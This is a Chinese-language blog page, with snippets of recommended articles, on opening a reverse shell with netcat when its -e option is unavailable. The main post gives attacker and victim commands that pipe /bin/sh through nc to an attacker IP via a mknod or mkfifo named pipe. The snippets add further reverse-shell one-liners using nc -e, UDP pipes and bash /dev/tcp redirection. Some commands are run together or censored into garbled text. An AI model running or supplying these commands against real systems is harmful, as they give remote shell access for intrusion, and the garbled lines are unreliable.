nc反弹php,NC不使用-e选项反弹shell

最新推荐文章于 2023-11-10 14:18:22 发布
最新推荐文章于 2023-11-10 14:18:22 发布
阅读量655 收藏
点赞数
文章标签: nc反弹php

对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:

Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh

在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_SECURITY_HOLE常量),也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就没办法利用了呢?天无绝人之路,来看下面的TIP。

在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:root@bt:~#mknod /tmp/backpipe proot@bt:~#/bin/sh 0/tmp/backpipe

第一条命令使用mknod在tmp目录下创建一个管道backpipe,第二条命令首先将默认shell环境的输入重定向给刚才创建的管道,然后将输出通过nc attackerip listenport重定向到***者一端,最后将shell的执行结果再重定向到管道中。

20130510125824_42692.png

网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。

SamWanng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NC不用-e建立TCP/UDP 反弹连接shell
zhang35的博客
04-26 1340
主机1监听端口,主机2发起连接。 TCP shell 主机1: nc -nvlp 4444 主机2: /bin/sh 0</tmp/backpipe | nc 主机1的IP 4444 1>/tmp/backpipe UDP shell 攻击机: nc -nuvlp 4444 靶机: mkfifo fifo nc -u 主机1的IP 4444 < fifo | { ec...
[TIP]NC使用-e选项反弹shell
weixin_34315189的博客
11-16 823
【转自】http://www.2cto.com/article/201305/209914.html 攻击方执行: 1 nc-lnvp4430 被攻击方执行: 1 2 mknod/tmp/backpipep /bin/sh0</tmp/backpipe|nc192.168.xx.xx4...
NC使用-e选项反弹shell
weixin_34352449的博客
06-25 2396
对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的n...
关于nc无法使用-e参数 nc:invalid option -- ‘e’
tonine9的博客
07-24 3515
关于nc无法使用-e参数,解决方法。安装之后,由于ubuntu默认安装的是netcat-openbsd,选择/bin/nc.traditional的编号。nc老版本是不能采用-e这个参数的。
Linux下NC反弹shell命令(推荐)
09-15
对于`nc`自身,不使用`-e`参数的反弹Shell方法如下: 1. 创建一个管道(pipe): ```bash mknod /tmp/backpipe p ``` 2. 使用管道启动Shell并连接: ```bash /bin/sh 0| nc x.x.x.x 4444 1>/tmp/backpipe ```...
详解NC反弹shell的几种方法
01-08
nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port ...
NC反弹CMD.EXE
04-20
NC反弹CMD
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常...[ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
NC_SHELL反弹提权.rar
05-09
,NC_SHELL反弹提权.
php大马如何使用nc反弹提权,使用NC反弹Shell
weixin_39913628的博客
03-13 368
今日中午有某牛牛问我如何使用NC反弹shell当时真是冷汗直冒!哎,郁闷,正好此时有空就写出来供某牛牛和小菜们学习一下!使用NC反弹Shell在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdShell时,首先...
php liunx反弹大马,Linux 下反弹 Shell 方法总结
weixin_33895274的博客
03-12 393
原标题:Linux 下反弹 Shell 方法总结16004488 所谓反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上。实验环境:CentOS 6.5:192.168.0.3kali2.0:192.168.0.4方法一反弹shell命令如下:bash -i >& /dev/tcp/ip/po...
nc反弹php,Linux下NC反弹shell命令
weixin_35647899的博客
04-12 110
FPGA高级设计——时序分析和收敛(转)何谓静态时序分析(Static Timing Analysis,简称STA)? 它可以简单的定义为:设计者提出一些特定的时序要求(或者说是添加特定的时序约束),套用特定的时序模型,针对特定的电路进行分 ...linux 基础学习图解http://www.cnblogs.com/xiaoluo501395377/category/465892.html关于判断...
nc的参数使用
xj28555的博客
08-09 1107
-c shell命令为“-e”;使用/bin/sh来执行[hargerous!!] -e文件名程序在连接后执行[危险!!] -b允许广播 -g网关源路由跃点,最多8个 -G num源路由指针:4,8,12。。。 -h这个垃圾 -发送的线路和扫描的端口的延迟间隔为1秒 -k在套接字上设置keepalive选项 -l监听模式,用于入站连接 -n仅数字IP地址,无DNS -o文件十六进制流量转储 -p端口本地端口号 -r随机化本地和远程端口 -在stdin上的EOF和秒延迟后q秒退出
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4634
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
NC反弹shell的几种方法
qq_59350385的博客
05-12 9653
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
解决centos使用nc命令报错:Ncat: Connection refused.
热门推荐
呆萌的代Ma
11-21 1万+
直接在命令行里输入: nc 如果显示: Ncat: You must specify a host to connect to. QUITTING. 恭喜你,与博主的问题一致,下面是解决方案与问题解析 解决方法 wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certificate tar -zxf netcat-0.7.1.tar.gz cd netcat-0.
netcat没有-e选项解决方法(反弹shell用法)
最新发布
qq_50854662的博客
11-10 390
netcat没有-e选项
nc (NetCat) 网络安全工具介绍
cavalier的学习之路
05-04 9217
搞系统安全的人,可能没人没听说过大名鼎鼎的nc吧,它可以代替telnet,可以启监听程序,可以用来传输文件,可以用来作为黑客辅助程序,深受大量hacker的喜爱,其功能有如瑞士军刀般好用。 NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动
NC 反弹shell
08-30
nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。 还有一种方法是使用php反弹shell,需要目标机器安装NC。命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样,这种方法需要在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值